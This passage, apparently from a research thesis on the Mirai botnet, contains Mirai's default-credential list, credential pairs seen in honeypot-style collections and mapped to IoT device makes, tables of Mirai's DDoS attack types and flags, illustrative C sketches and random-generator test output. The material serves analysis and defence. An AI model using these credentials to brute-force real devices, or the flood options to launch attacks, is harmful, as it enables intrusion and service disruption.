| 5 | admin | 1111 |
| 6 | admin | 1111111 |
| 7 | admin | 1234 |
| 8 | admin | 12345 |
| 9 | admin | 123456 |
| 10 | admin | 54321 |
| 11 | admin | 7ujMko0admin |
| 12 | admin | admin |
| 13 | admin | admin1234 |
| 14 | admin | meinsm |
| 15 | admin | pass |
| 16 | admin | password |
| 17 | admin | smcadmin |
| 18 | admin1 | password |
| 19 | administrator | 1234 |
| 20 | guest | 12345 |
| 21 | guest | guest |
| 22 | mother | fucker |
| 23 | root | [empty string] |
| 24 | root | 00000000 |
| 25 | root | 1111 |
| 26 | root | 1234 |
| 27 | root | 12345 |
| 28 | root | 123456 |
| 29 | root | 54321 |
| 30 | root | 666666 |
| 31 | root | 7ujMko0admin |
| 32 | root | 7ujMko0vizxv |
| 33 | root | 888888 |
| 34 | root | Zte521 |
| 35 | root | admin |
| 36 | root | anko |
| 37 | root | default |
| 38 | root | dreambox |
| 39 | root | hi3518 |
| 40 | root | ikwb |
| 41 | root | jvbzd |
| 42 | root | juantech |
| 43 | root | klv123 |
| 44 | root | klv1234 |
| 45 | root | pass |
| 46 | root | password |
| 47 | root | realtek |
| 48 | root | root |
| 49 | root | system |
| 50 | root | user |
| 51 | root | vizxv |
| 52 | root | xc3511 |
| 53 | root | xmhdipc |
| 54 | root | zlxx. |
| 55 | service | service |
| 56 | supervisor | supervisor |
| 57 | support | support |
| 58 | tech | tech |
| 59 | ubnt | ubnt |
| 60 | user | user |

Table B.1: Default Credentials Used by Mirai
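Each credential pair is registered through add_auth_entry() (Section A.4.2) with a weight, and random_auth_entry() then draws a pair with probability proportional to that weight. The following is a minimal, self-contained sketch of that weighted-range technique. The struct layout, the function names `build_ranges` and `pick`, and any weight values passed in are illustrative assumptions, not taken from the thesis or the Mirai source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative credential entry; weights are supplied by the caller. */
struct cred {
    const char *user;
    const char *pass;
    uint16_t weight;      /* relative likelihood of being tried */
    uint16_t weight_min;  /* filled in by build_ranges() */
    uint16_t weight_max;  /* filled in by build_ranges() */
};

/* Give each entry the half-open range [weight_min, weight_max) and
 * return the total weight. */
static uint16_t build_ranges(struct cred *tab, size_t n)
{
    uint16_t total = 0;
    for (size_t i = 0; i < n; i++) {
        tab[i].weight_min = total;
        total = (uint16_t)(total + tab[i].weight);
        tab[i].weight_max = total;
    }
    return total;
}

/* Map a raw random value r onto an entry. Entries with larger weights
 * own wider ranges and are therefore selected more often. */
static const struct cred *pick(const struct cred *tab, size_t n,
                               uint16_t total, uint32_t r)
{
    uint16_t v;

    if (total == 0)          /* avoid a modulo-by-zero on an empty table */
        return NULL;
    v = (uint16_t)(r % total);
    for (size_t i = 0; i < n; i++)
        if (v >= tab[i].weight_min && v < tab[i].weight_max)
            return &tab[i];
    return NULL;
}
```

With hypothetical weights of 10, 9, and 7 for three entries, the total is 26, so the first entry is chosen for reduced values 0 through 9, the second for 10 through 18, and the third for 19 through 25. The explicit zero-total guard is an addition in this sketch.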

B.2 Credentials Seen in Collections

The following credentials were all seen in the data collected in this experiment. All hardcoded Mirai credentials were seen in our collections. Many of the other combinations appear to have been derived from these username and password combinations. Some device identification was completed by Brian Krebs in [31]. Many others can be found in [42], [46], [47], [48], and [49]. If the device is unknown, the device field is blank. Additionally, please note that even if a product is named, it may not be the only product using those credentials.

| # | Username | Password | Device, if known | In Mirai Release? |
|---|---|---|---|---|
| 1 | 1234 | 1234 | common password | X |
| 2 | 5up | 5up | SMC Router | X |
| 3 | 666666 | 666666 | Dahua IP Camera | X |
| 4 | 888888 | 888888 | Dahua DVR or IP Camera | X |
| 5 | !!Huawei | @HuaweiHgw | Huawei Router | X |
| 6 | Admin | 111111 | common password | X |
| 7 | Admin | 5up | SMC Router | X |
| 8 | Admin | Admin | common combination | X |
| 9 | Administrator | admin | | X |
| 10 | Administrator | default | | X |
| 11 | Administrator | meinsm | Mobotix Camera? | X |
| 12 | Administrator | password | common combination | X |
| 13 | Huawei | Huawei | Huawei Router | X |
| 14 | Manager | manager | | X |
| 15 | ROOT | PASSWD | | X |
| 16 | Zte521 | Zte521 | ZTE Router | X |
| 17 | admin | [empty string] | common | X |
| 18 | admin | 1 | | X |
| 19 | admin | 11 | | X |
| 20 | admin | 1111 | Xerox Printer | X |
| 21 | admin | 11111 | common password | X |
| 22 | admin | 1111111 | Samsung Camera | X |
| 23 | admin | 11111111 | | X |
| 24 | admin | 123 | | X |
| 25 | admin | 1234 | common combination | X |
| 26 | admin | 12345 | common combination | X |
| 27 | admin | 123456 | ACTi IP Camera, Uniview IP Camera | X |
| 28 | admin | 1234567 | | X |
| 29 | admin | 12345678 | | X |
| 30 | admin | 54321 | | X |
| 31 | admin | 5up | SMC Router | X |
| 32 | admin | 666666 | Dahua IP Camera or DVR | X |
| 33 | admin | 7ujMko0admin | Dahua IP Camera | X |
| 34 | admin | 888888 | Dahua IP Camera or DVR | X |
| 35 | admin | ZmqVfoSIP | | X |
| 36 | admin | admin | common combination | X |
| 37 | admin | admin1234 | | X |
| 38 | admin | admin888 | | X |
| 39 | admin | benq1234 | | X |
| 40 | admin | guest | | X |
| 41 | admin | ho4uku6at | | X |
| 42 | admin | meinsm | Mobotix IP Camera | X |
| 43 | admin | oelinux1234 | | X |
| 44 | admin | pass | common combination | X |
| 45 | admin | password | common combination | X |
| 46 | admin | private | | X |
| 47 | admin | root | common combination | X |
| 48 | admin | smcadmin | SMC Router | X |
| 49 | admin1 | password | | X |
| 50 | administrator | 1234 | | X |
| 51 | administrator | user | | X |
| 52 | adminlvjh | adminlvjh123 | Chinese IP Camera | X |
| 53 | cisco | cisco | Cisco Router | X |
| 54 | cusadmin | highspeed | SMC Router | X |
| 55 | default | S2fGqNFs | HiSilicon IP Camera | X |
| 56 | default | antslq | | X |
| 57 | default | tlJwpbo6 | HiSilicon IP Camera | X |
| 58 | dvr | dvr | | X |
| 59 | e8ehome | e8ehome | Chinese Router | X |
| 60 | e8ehomeasb | e8ehomeasb | Chinese Router | X |
| 61 | e8telnet | e8telnet | Chinese Router | X |
| 62 | guest | 12345 | | X |
| 63 | guest | admin | | X |
| 64 | guest | guest | | X |
| 65 | h3c | h3c | H3C Switch | X |
| 66 | huawei | [email protected] | Huawei Router | X |
| 67 | huawei | huawei | Huawei Router | X |
| 68 | mother | fucker | | X |
| 69 | netgear | netgear | Netgear Router | X |
| 70 | realtek | realtek | RealTek Router | X |
| 71 | root | [empty string] | common combination | X |
| 72 | root | 0 | | X |
| 73 | root | 00000000 | Panasonic Printer | X |
| 74 | root | 0123456789 | | X |
| 75 | root | 1001chin | | X |
| 76 | root | 1111 | | X |
| 77 | root | 11111 | | X |
| 78 | root | 123 | | X |
| 79 | root | 1234 | | X |
| 80 | root | 12345 | Comay Router | X |
| 81 | root | 123456 | | X |
| 82 | root | 12345678 | | X |
| 83 | root | 123456789 | | X |
| 84 | root | 1234567890 | | X |
| 85 | root | 4321 | | X |
| 86 | root | 54321 | Packet8 VOIP Phone | X |
| 87 | root | 5up | SMC Router | X |
| 88 | root | 666666 | Dahua DVR | X |
| 89 | root | 7ujMko0admin | Dahua IP Camera | X |
| 90 | root | 7ujMko0vizxv | Dahua IP Camera | X |
| 91 | root | 888888 | Dahua DVR | X |
| 92 | root | 88888888 | DVR | X |
| 93 | root | GM8182 | DVR | X |
| 94 | root | PASSWD | | X |
| 95 | root | Zte521 | ZTE Router | X |
| 96 | root | admin | common combination | X |
| 97 | root | anko | ANKO DVR | X |
| 98 | root | cat1029 | HiSilicon IP Camera | X |
| 99 | root | cisco | Cisco Router | X |
| 100 | root | default | | X |
| 101 | root | dreambox | Dreambox TV Receiver | X |
| 102 | root | dvr | DVR | X |
| 103 | root | friend | | X |
| 104 | root | grouter | Shida 2110EH Router | X |
| 105 | root | h3c | H3C Switch | X |
| 106 | root | hg2x0 | Huawei Router | X |
| 107 | root | hi3518 | HiSilicon IP Camera | X |
| 108 | root | hunt5759 | | X |
| 109 | root | ikwb | Toshiba Network Camera | X |
| 110 | root | juantech | Guangzhou Juan Optical DVR | X |
| 111 | root | jvbzd | HiSilicon IP Camera | X |
| 112 | root | klv123 | HiSilicon IP Camera | X |
| 113 | root | klv1234 | HiSilicon IP Camera | X |
| 114 | root | nmgx_wapia | Chinese Router | X |
| 115 | root | oelinux123 | Telstra Mobile Router | X |
| 116 | root | pass | Axis IP Camera | X |
| 117 | root | passwd | | X |
| 118 | root | password | common combination | X |
| 119 | root | private | | X |
| 120 | root | realtek | RealTek Router | X |
| 121 | root | root | | X |
| 122 | root | root123 | | X |
| 123 | root | root1234 | | X |
| 124 | root | root12345 | | X |
| 125 | root | root123456 | | X |
| 126 | root | root321 | | X |
| 127 | root | root4321 | | X |
| 128 | root | root54321 | | X |
| 129 | root | root654321 | | X |
| 130 | root | rootpassword | | X |
| 131 | root | rootroot | | X |
| 132 | root | solokey | ZKSoftware Device | X |
| 133 | root | system | IQinVision IP Camera | X |
| 134 | root | telecomadmin | Huawei Router | X |
| 135 | root | telnet | | X |
| 136 | root | tl789 | | X |
| 137 | root | twe8ehome | Chinese Router | X |
| 138 | root | user | | X |
| 139 | root | vizxv | Dahua Camera | X |
| 140 | root | xc3511 | DVR Model Number H.264 | X |
| 141 | root | xmhdipc | HiSilicon IP Camera, Shenzhen Anran Security Camera | X |
| 142 | root | zlxx. | EV ZLX Speaker | X |
| 143 | service | service | | X |
| 144 | superadmin | Is$uper@dmin | Sagem F@st 2804 Router | X |
| 145 | supervisor | supervisor | VideoIQ IP Camera | X |
| 146 | support | support | | X |
| 147 | system | system | | X |
| 148 | tech | tech | 3COM (now HP) Router | X |
| 149 | telecomadmin | nE7jA%5m | Chinese Router | X |
| 150 | telnet | telnet | | X |
| 151 | telnetadmin | telnetadmin | | X |
| 152 | toor | toor | | X |
| 153 | ubnt | ubnt | Ubiquiti AirOS Router, Ubiquiti IP Camera | X |
| 154 | user | password | common combination | X |
| 155 | user | qweasdzx | | X |
| 156 | user | user | common combination | X |
| 157 | useradmin | useradmin | | X |
| 158 | zte | zte | ZTE Router | X |

Table B.2: Credentials Seen in Collections

B.3 Attack Types and Flags

A user with access to a Mirai botnet account is able to execute a fixed list of attack types. All of them are DDoS attacks of varying kinds, and they are defined in attack.go in the mirai/cnc subdirectory. The information is consolidated into the following tables.

| Command Name | Flag ID | Flag Description |
|---|---|---|
| len | 0 | Size of packet data, default is 512 bytes |
| rand | 1 | Randomize packet data content, default is 1 (yes) |
| tos | 2 | TOS field value in IP header, default is 0 |
| ident | 3 | ID field value in IP header, default is random |
| ttl | 4 | TTL field in IP header, default is 255 |
| df | 5 | Set the Don't-Fragment bit in IP header, default is 0 (no) |
| sport | 6 | Source port, default is random |
| dport | 7 | Destination port, default is random |
| domain | 8 | Domain name to attack |
| dhid | 9 | Domain name transaction ID, default is random |
| urg | 11 | Set the URG bit in TCP header, default is 0 (no) |
| ack | 12 | Set the ACK bit in TCP header, default is 0 (no) except for ACK flood |
| psh | 13 | Set the PSH bit in TCP header, default is 0 (no) |
| rst | 14 | Set the RST bit in TCP header, default is 0 (no) |
| syn | 15 | Set the SYN bit in TCP header, default is 0 (no) except for SYN flood |
| fin | 16 | Set the FIN bit in TCP header, default is 0 (no) |
| seqnum | 17 | Sequence number value in TCP header, default is random |
| acknum | 18 | Ack number value in TCP header, default is random |
| gcip | 19 | Set internal IP to destination IP, default is 0 (no) |
| method | 20 | HTTP method name, default is get |
| postdata | 21 | POST data, default is empty/none |
| path | 22 | HTTP path, default is / |
| ssl* | 23 | Use HTTPS/SSL |
| conns | 24 | Number of connections |
| source | 25 | Source IP address, 255.255.255.255 for random |

Table B.3: Attack Flags

* This flag is commented out in the released code and is unused in the given attack list.
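The six boolean options urg, ack, psh, rst, syn, and fin in Table B.3 correspond to control bits in the flags byte of the TCP header. As a rough sketch of how such options could be folded into that byte, the example below uses the standard TCP bit positions; the `tcp_opts` struct and the `tcp_flag_byte` function are hypothetical names introduced for illustration and are not part of the Mirai code.

```c
#include <assert.h>
#include <stdint.h>

/* Standard TCP control-bit positions within the flags byte. */
enum {
    FLAG_FIN = 0x01,
    FLAG_SYN = 0x02,
    FLAG_RST = 0x04,
    FLAG_PSH = 0x08,
    FLAG_ACK = 0x10,
    FLAG_URG = 0x20
};

/* Hypothetical container for the six boolean attack options. */
struct tcp_opts {
    int urg, ack, psh, rst, syn, fin;
};

/* Combine the enabled options into a single TCP flags byte. */
static uint8_t tcp_flag_byte(const struct tcp_opts *o)
{
    uint8_t f = 0;

    if (o->urg) f |= FLAG_URG;
    if (o->ack) f |= FLAG_ACK;
    if (o->psh) f |= FLAG_PSH;
    if (o->rst) f |= FLAG_RST;
    if (o->syn) f |= FLAG_SYN;
    if (o->fin) f |= FLAG_FIN;
    return f;
}
```

Under these definitions, a SYN flood with only syn enabled yields the byte 0x02, and an ACK flood with only ack enabled yields 0x10.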

| Command Name | Attack ID | Attack Description | Attack Flags Used |
|---|---|---|---|
| udp | 0 | UDP flood | len, rand, tos, ident, ttl, df, sport, dport, source |
| vse | 1 | Valve source engine specific flood | tos, ident, ttl, df, sport, dport |
| dns | 2 | DNS resolver flood using the target's domain, input IP is ignored | tos, ident, ttl, df, sport, dport, domain, dhid |
| syn | 3 | SYN flood | tos, ident, ttl, df, sport, dport, urg, ack, psh, rst, syn, fin, seqnum, acknum, source |
| ack | 4 | ACK flood | len, rand, tos, ident, ttl, df, sport, dport, urg, ack, psh, rst, syn, fin, seqnum, acknum, source |
| stomp | 5 | TCP stomp flood | len, rand, tos, ident, ttl, df, dport, urg, ack, psh, rst, syn, fin |
| greip | 6 | GRE IP flood | len, rand, tos, ident, ttl, df, sport, dport, gcip, source |
| greeth | 7 | GRE Ethernet flood | len, rand, tos, ident, ttl, df, sport, dport, gcip, source |
| udpplain | 9 | UDP flood with fewer options, optimized for higher PPS | len, rand, dport |
| http | 10 | HTTP flood | dport, domain, method, postdata, path, conns |

Table B.4: Attack Types
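Tables B.3 and B.4 together define which flags each attack accepts. One compact way to represent that relationship is a bitmask per attack, with one bit per flag ID. The sketch below encodes two rows of Table B.4 in this way. It is an illustration only: the released controller is written in Go, and the names `struct attack`, `find_attack`, and `flag_allowed` are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Flag IDs from Table B.3 (only those needed for the two rows below). */
enum {
    F_LEN = 0, F_RAND = 1, F_DPORT = 7, F_DOMAIN = 8,
    F_METHOD = 20, F_POSTDATA = 21, F_PATH = 22, F_CONNS = 24
};

#define BIT(id) (1u << (id))

/* Hypothetical record: command name, attack ID, and allowed-flag mask. */
struct attack {
    const char *name;
    uint8_t id;
    uint32_t allowed;
};

static const struct attack attacks[] = {
    { "udpplain", 9,  BIT(F_LEN) | BIT(F_RAND) | BIT(F_DPORT) },
    { "http",     10, BIT(F_DPORT) | BIT(F_DOMAIN) | BIT(F_METHOD) |
                      BIT(F_POSTDATA) | BIT(F_PATH) | BIT(F_CONNS) },
};

/* Look up an attack by command name; returns NULL if it is unknown. */
static const struct attack *find_attack(const char *name)
{
    for (size_t i = 0; i < sizeof attacks / sizeof attacks[0]; i++)
        if (strcmp(attacks[i].name, name) == 0)
            return &attacks[i];
    return NULL;
}

/* Report whether the given flag ID may be used with this attack. */
static int flag_allowed(const struct attack *a, unsigned flag_id)
{
    return flag_id < 32 && (a->allowed & BIT(flag_id)) != 0;
}
```

For instance, `flag_allowed(find_attack("http"), F_PATH)` is true, while the same check against "udpplain" is false, matching the last two rows of Table B.4. A 32-bit mask suffices because the highest flag ID in Table B.3 is 25.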

B.4 Dieharder Test Output

The rand_next() random number generator found in Mirai was run through the Dieharder test suite [38]. A list of 1 billion integers was generated as input and written to the file rand-out.txt. The terminal output of that run is reproduced at the end of this section.
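As a rough illustration of how such an input file might be produced, the sketch below writes values from a small xorshift-style generator in the ASCII layout that Dieharder reads from a file: a short header followed by one unsigned integer per line. The generator shown is an assumed stand-in for rand_next(), seeded with caller-supplied constants so that runs are reproducible; the names `struct rng`, `rng_next`, and `write_dieharder_input` are hypothetical.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* State of a four-word xorshift-style generator. (Assumed stand-in for
 * Mirai's rand_next(); seeds are supplied by the caller.) */
struct rng {
    uint32_t x, y, z, w;
};

static uint32_t rng_next(struct rng *s)
{
    uint32_t t = s->x;

    t ^= t << 11;
    t ^= t >> 8;
    s->x = s->y;
    s->y = s->z;
    s->z = s->w;
    s->w ^= s->w >> 19;
    s->w ^= t;
    return s->w;
}

/* Write `count` values as a header plus one decimal integer per line.
 * Returns 0 on success and -1 if a write fails. */
static int write_dieharder_input(FILE *out, struct rng *s, uint32_t count)
{
    if (fprintf(out, "type: d\ncount: %" PRIu32 "\nnumbit: 32\n", count) < 0)
        return -1;
    for (uint32_t i = 0; i < count; i++)
        if (fprintf(out, "%" PRIu32 "\n", rng_next(s)) < 0)
            return -1;
    return 0;
}
```

A file written this way would typically be handed to the suite with a command along the lines of `dieharder -a -g 202 -f rand-out.txt`, where generator 202 selects ASCII file input. The repeated "rewound" messages in the output indicate that the tests consumed more values than the file contained, so Dieharder reread it from the start.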

    #======#
    # dieharder version 3.31.1 Copyright 2003 Robert G. Brown #
    #======#
    rng_name | filename |rands/second|
    file_input| rand-out.txt| 4.75e+06 |
    #======#
    test_name |ntup| tsamples |psamples| p-value |Assessment
    #======#
    diehard_birthdays| 0| 100| 100|0.83609157| PASSED
    diehard_operm5| 0| 1000000| 100|0.97382676| PASSED
    diehard_rank_32x32| 0| 40000| 100|0.75902251| PASSED
    diehard_rank_6x8| 0| 100000| 100|0.56586170| PASSED
    diehard_bitstream| 0| 2097152| 100|0.83822111| PASSED
    diehard_opso| 0| 2097152| 100|0.38470215| PASSED
    diehard_oqso| 0| 2097152| 100|0.88777437| PASSED
    diehard_dna| 0| 2097152| 100|0.66601073| PASSED
    diehard_count_1s_str| 0| 256000| 100|0.86113920| PASSED
    diehard_count_1s_byt| 0| 256000| 100|0.93104577| PASSED
    diehard_parking_lot| 0| 12000| 100|0.26814905| PASSED
    diehard_2dsphere| 2| 8000| 100|0.97837695| PASSED
    diehard_3dsphere| 3| 4000| 100|0.46256138| PASSED
    # The file file_input was rewound 1 times
    diehard_squeeze| 0| 100000| 100|0.30910275| PASSED
    # The file file_input was rewound 1 times
    diehard_sums| 0| 100| 100|0.00356192| WEAK
    # The file file_input was rewound 1 times
    diehard_runs| 0| 100000| 100|0.63303029| PASSED
    diehard_runs| 0| 100000| 100|0.29425160| PASSED
    # The file file_input was rewound 1 times
    diehard_craps| 0| 200000| 100|0.31877746| PASSED
    diehard_craps| 0| 200000| 100|0.29224712| PASSED
    # The file file_input was rewound 3 times
    marsaglia_tsang_gcd| 0| 10000000| 100|0.12407971| PASSED
    marsaglia_tsang_gcd| 0| 10000000| 100|0.54303713| PASSED
    # The file file_input was rewound 3 times
    sts_monobit| 1| 100000| 100|0.98998524| PASSED
    # The file file_input was rewound 3 times
    sts_runs| 2| 100000| 100|0.87578329| PASSED
    # The file file_input was rewound 3 times
    sts_serial| 1| 100000| 100|0.95060384| PASSED
    sts_serial| 2| 100000| 100|0.28310247| PASSED
    sts_serial| 3| 100000| 100|0.87366236| PASSED
    sts_serial| 3| 100000| 100|0.24227053| PASSED
    sts_serial| 4| 100000| 100|0.65691819| PASSED
    sts_serial| 4| 100000| 100|0.61810062| PASSED
    sts_serial| 5| 100000| 100|0.64222478| PASSED
    sts_serial| 5| 100000| 100|0.73623440| PASSED
    sts_serial| 6| 100000| 100|0.41945001| PASSED
    sts_serial| 6| 100000| 100|0.76379319| PASSED
    sts_serial| 7| 100000| 100|0.34143872| PASSED
    sts_serial| 7| 100000| 100|0.51791054| PASSED
    sts_serial| 8| 100000| 100|0.27491889| PASSED
    sts_serial| 8| 100000| 100|0.53411066| PASSED
    sts_serial| 9| 100000| 100|0.04460440| PASSED
    sts_serial| 9| 100000| 100|0.67477287| PASSED
    sts_serial| 10| 100000| 100|0.75382504| PASSED
    sts_serial| 10| 100000| 100|0.30917173| PASSED
    sts_serial| 11| 100000| 100|0.70596790| PASSED
    sts_serial| 11| 100000| 100|0.68132011| PASSED
    sts_serial| 12| 100000| 100|0.89889121| PASSED
    sts_serial| 12| 100000| 100|0.25224630| PASSED
    sts_serial| 13| 100000| 100|0.90279437| PASSED
    sts_serial| 13| 100000| 100|0.78279920| PASSED
    sts_serial| 14| 100000| 100|0.59854454| PASSED
    sts_serial| 14| 100000| 100|0.23992835| PASSED
    sts_serial| 15| 100000| 100|0.80303002| PASSED
    sts_serial| 15| 100000| 100|0.49221848| PASSED
    sts_serial| 16| 100000| 100|0.21368050| PASSED
    sts_serial| 16| 100000| 100|0.06374385| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 1| 100000| 100|0.82129508| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 2| 100000| 100|0.05386404| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 3| 100000| 100|0.47917126| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 4| 100000| 100|0.08809397| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 5| 100000| 100|0.89599389| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 6| 100000| 100|0.97271183| PASSED
    # The file file_input was rewound 3 times
    rgb_bitdist| 7| 100000| 100|0.39831985| PASSED
    # The file file_input was rewound 4 times
    rgb_bitdist| 8| 100000| 100|0.97180550| PASSED
    # The file file_input was rewound 4 times
    rgb_bitdist| 9| 100000| 100|0.63708607| PASSED
    # The file file_input was rewound 4 times
    rgb_bitdist| 10| 100000| 100|0.91685104| PASSED
    # The file file_input was rewound 4 times
    rgb_bitdist| 11| 100000| 100|0.06371416| PASSED
    # The file file_input was rewound 4 times
    rgb_bitdist| 12| 100000| 100|0.07445471| PASSED
    # The file file_input was rewound 4 times
    rgb_minimum_distance| 2| 10000| 1000|0.83797165| PASSED
    # The file file_input was rewound 4 times
    rgb_minimum_distance| 3| 10000| 1000|0.54332203| PASSED
    # The file file_input was rewound 4 times
    rgb_minimum_distance| 4| 10000| 1000|0.91763093| PASSED
    # The file file_input was rewound 4 times
    rgb_minimum_distance| 5| 10000| 1000|0.09081409| PASSED
    # The file file_input was rewound 5 times
    rgb_permutations| 2| 100000| 100|0.72550434| PASSED
    # The file file_input was rewound 5 times
    rgb_permutations| 3| 100000| 100|0.33484862| PASSED
    # The file file_input was rewound 5 times
    rgb_permutations| 4| 100000| 100|0.94350455| PASSED
    # The file file_input was rewound 5 times
    rgb_permutations| 5| 100000| 100|0.01577084| PASSED
    # The file file_input was rewound 5 times
    rgb_lagged_sum| 0| 1000000| 100|0.23944443| PASSED
    # The file file_input was rewound 5 times
    rgb_lagged_sum| 1| 1000000| 100|0.42863661| PASSED
    # The file file_input was rewound 5 times
    rgb_lagged_sum| 2| 1000000| 100|0.37185446| PASSED
    # The file file_input was rewound 6 times
    rgb_lagged_sum| 3| 1000000| 100|0.89451232| PASSED
    # The file file_input was rewound 6 times
    rgb_lagged_sum| 4| 1000000| 100|0.72328699| PASSED
    # The file file_input was rewound 7 times
    rgb_lagged_sum| 5| 1000000| 100|0.38420350| PASSED
    # The file file_input was rewound 7 times
    rgb_lagged_sum| 6| 1000000| 100|0.94217892| PASSED
    # The file file_input was rewound 8 times
    rgb_lagged_sum| 7| 1000000| 100|0.62527044| PASSED
    # The file file_input was rewound 9 times
    rgb_lagged_sum| 8| 1000000| 100|0.25248113| PASSED
    # The file file_input was rewound 10 times
    rgb_lagged_sum| 9| 1000000| 100|0.48382543| PASSED
    # The file file_input was rewound 11 times
    rgb_lagged_sum| 10| 1000000| 100|0.95248385| PASSED
    # The file file_input was rewound 12 times
    rgb_lagged_sum| 11| 1000000| 100|0.40536936| PASSED
    # The file file_input was rewound 14 times
    rgb_lagged_sum| 12| 1000000| 100|0.31216446| PASSED
    # The file file_input was rewound 15 times
    rgb_lagged_sum| 13| 1000000| 100|0.19243117| PASSED
    # The file file_input was rewound 17 times
    rgb_lagged_sum| 14| 1000000| 100|0.79758242| PASSED
    # The file file_input was rewound 18 times
    rgb_lagged_sum| 15| 1000000| 100|0.60939845| PASSED
    # The file file_input was rewound 20 times
    rgb_lagged_sum| 16| 1000000| 100|0.99926753| WEAK
    # The file file_input was rewound 22 times
    rgb_lagged_sum| 17| 1000000| 100|0.91456988| PASSED
    # The file file_input was rewound 24 times
    rgb_lagged_sum| 18| 1000000| 100|0.22601368| PASSED
    # The file file_input was rewound 26 times
    rgb_lagged_sum| 19| 1000000| 100|0.79273460| PASSED
    # The file file_input was rewound 28 times
    rgb_lagged_sum| 20| 1000000| 100|0.67312082| PASSED
    # The file file_input was rewound 30 times
    rgb_lagged_sum| 21| 1000000| 100|0.51838941| PASSED
    # The file file_input was rewound 32 times
    rgb_lagged_sum| 22| 1000000| 100|0.53383580| PASSED
    # The file file_input was rewound 35 times
    rgb_lagged_sum| 23| 1000000| 100|0.58942490| PASSED
    # The file file_input was rewound 37 times
    rgb_lagged_sum| 24| 1000000| 100|0.76227644| PASSED
    # The file file_input was rewound 40 times
    rgb_lagged_sum| 25| 1000000| 100|0.74931331| PASSED
    # The file file_input was rewound 42 times
    rgb_lagged_sum| 26| 1000000| 100|0.06591543| PASSED
    # The file file_input was rewound 45 times
    rgb_lagged_sum| 27| 1000000| 100|0.99598155| WEAK
    # The file file_input was rewound 48 times
    rgb_lagged_sum| 28| 1000000| 100|0.02597328| PASSED
    # The file file_input was rewound 51 times
    rgb_lagged_sum| 29| 1000000| 100|0.07184119| PASSED
    # The file file_input was rewound 54 times
    rgb_lagged_sum| 30| 1000000| 100|0.00689498| PASSED
    # The file file_input was rewound 57 times
    rgb_lagged_sum| 31| 1000000| 100|0.02626040| PASSED
    # The file file_input was rewound 61 times
    rgb_lagged_sum| 32| 1000000| 100|0.77697563| PASSED
    # The file file_input was rewound 61 times
    rgb_kstest_test| 0| 10000| 1000|0.47483945| PASSED
    # The file file_input was rewound 61 times
    dab_bytedistrib| 0| 51200000| 1|0.33010460| PASSED
    # The file file_input was rewound 61 times
    dab_dct| 256| 50000| 1|0.70630354| PASSED
    Preparing to run test 207. ntuple = 0
    # The file file_input was rewound 61 times
    dab_filltree| 32| 15000000| 1|0.53420292| PASSED
    dab_filltree| 32| 15000000| 1|0.31348870| PASSED
    Preparing to run test 208. ntuple = 0
    # The file file_input was rewound 61 times
    dab_filltree2| 0| 5000000| 1|0.15174195| PASSED
    dab_filltree2| 1| 5000000| 1|0.47669851| PASSED
    Preparing to run test 209. ntuple = 0
    # The file file_input was rewound 61 times
    dab_monobit2| 12| 65000000| 1|0.97843053| PASSED

Bibliography

[1] National Intelligence Council (2008) “Six technologies with potential impacts on US interests out to 2025,” Disruptive Civil Technologies 2008.
[2] Soper, T. (2016), “Amazon Echo sales reach 5M in two years, research firm says, as Google competitor enters market,” web, http://www.geekwire.com/2016/amazon-echo-sales-reach-5m-two-years-research-firm-says-google-competitor-enters-market/.

[3] Sun, L. (2016), “Connected Cars in the Next Decade: 4 Numbers Everyone Should Know,” web, http://www.fool.com/investing/general/2016/03/06/connected-cars-in-the-next-decade-4-numbers-everyo.aspx.
[4] Columbus, L. (2016), “Roundup Of Internet Of Things Forecasts And Market Estimates, 2016,” web, http://www.forbes.com/sites/louiscolumbus/2016/11/27/roundup-of-internet-of-things-forecasts-and-market-estimates-2016/.
[5] (2015), “Gartner Says 6.4 Billion Connected "Things" Will Be in Use in 2016, Up 30 Percent From 2015,” web, https://www.gartner.com/newsroom/id/3165317.
[6] Krebs, B. (2016), “KrebsOnSecurity Hit With Record DDoS,” web, https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/.

[7] https://github.com/jgamblin/Mirai-Source-Code.
[8] York, K. (2016), “Dyn Statement on 10/21/2016 DDoS Attack,” web, https://dyn.com/blog/dyn-statement-on-10212016-ddos-attack/.
[9] Hwang, Y. (2017), “The Hajime Worm - Is it the Solution to Mirai or the Next-Gen Botnet?” web, https://iot-for-all.com/hajime-worm-solution-mirai-next-gen-botnet/.
[10] Centers for Disease Control (2016), “About Parasites,” web, https://www.cdc.gov/parasites/about.html.
[11] “What Is the Difference: Viruses, Worms, Trojans, and Bots?” web, https://www.cisco.com/c/en/us/about/security-center/virus-differences.html.
[12] Orman, H. (2003) “The Morris worm: A fifteen-year perspective,” IEEE Security & Privacy, 99(5), pp. 35–43.
[13] Seltzer, L. (2010), “’I Love You’ Virus Turns Ten: What Have We Learned?” web, http://www.pcmag.com/article2/0,2817,2363172,00.asp.

[14] Staniford, S., V. Paxson, N. Weaver, et al. (2002) “How to 0wn the Internet in Your Spare Time.” in USENIX Security Symposium, vol. 2, pp. 14–15.

[15] Zou, C. C., W. Gong, and D. Towsley (2002) “Code red worm propagation modeling and analysis,” in Proceedings of the 9th ACM conference on Computer and communications security, ACM, pp. 138–147.

[16] Moore, D., V. Paxson, S. Savage, C. Shannon, S. Staniford, and N. Weaver (2003) “Inside the Slammer worm,” IEEE Security & Privacy, 1(4), pp. 33–39.
[17] Holz, T., M. Steiner, and F. Dahl (2008) “Measurements and mitigation of Peer-to-Peer-based Botnets: A case study on storm worm,” in Proceedings of the First USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET’08).
[18] Stone-Gross, B., M. Cova, L. Cavallaro, B. Gilbert, M. Szydlowski, R. Kemmerer, C. Kruegel, and G. Vigna (2009) “Your botnet is my botnet: analysis of a botnet takeover,” in Proceedings of the 16th ACM conference on Computer and communications security, ACM, pp. 635–647.

[19] Kelley, M. B. (2013) “The Stuxnet attack on Iran’s nuclear plant was ‘far more dangerous’ than previously thought,” Business Insider, 20.
